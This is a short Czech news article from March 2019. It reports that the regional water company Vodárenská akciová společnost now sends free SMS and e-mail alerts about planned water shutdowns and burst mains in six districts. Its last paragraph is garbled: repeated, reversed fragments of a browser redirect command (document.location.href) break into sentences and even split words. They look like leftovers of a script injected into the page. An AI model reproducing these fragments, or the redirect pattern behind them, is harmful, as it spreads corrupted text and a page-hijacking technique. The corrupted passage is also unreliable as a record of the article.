Rainbow page separator

Na odstávku nebo havárii vodovodu upozorní bezplatná „esemeska“

Středa, 13. března 2019

Žďársko / O odstávce nebo havárii na vodovodu, díky níž by nemusela téct voda, se nyní mají možnost dozvědět obyvatelé Žďárska prostřednictvím SMS zprávy. Vodárenská akciová společnost zprovoznila službu SMS Info a bezplatně ji nabízí odběratelům vody na jižní Moravě a Vysočině.
„Nová služba je od 1. března dostupná pro odběratele z více než 700 obcí okresů Brno-venkov, Blansko a Znojmo na jihu Moravy a Jihlava, Třebíč a Žďár nad Sázavou v Kraji Vysočina. Stačí se registrovat přes formulář nebo se přihlásit v zákaznickém informačním systému na webových stránkách www.vodarenska.cz,“ informovala Iva Librová z Vodárenské akciové společnosti s tím, že zájemcům mohou poradit také pracovníci v sídlech jednotlivých divizí firmy.
O případných problémech, ať už je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to plánovaná odstávka, anebo náhlá havárie, mohou být zájemci informováni buď prostřednictvím zmíněné SMS zprávy do mobilního telefonu, případně také e-mailem. „Dosud se o těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to událostech mohli zákazníci dozvědět například z webových stránek nebo z informací vkládaných do poš[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovních schránek,“ dodala Iva Librová.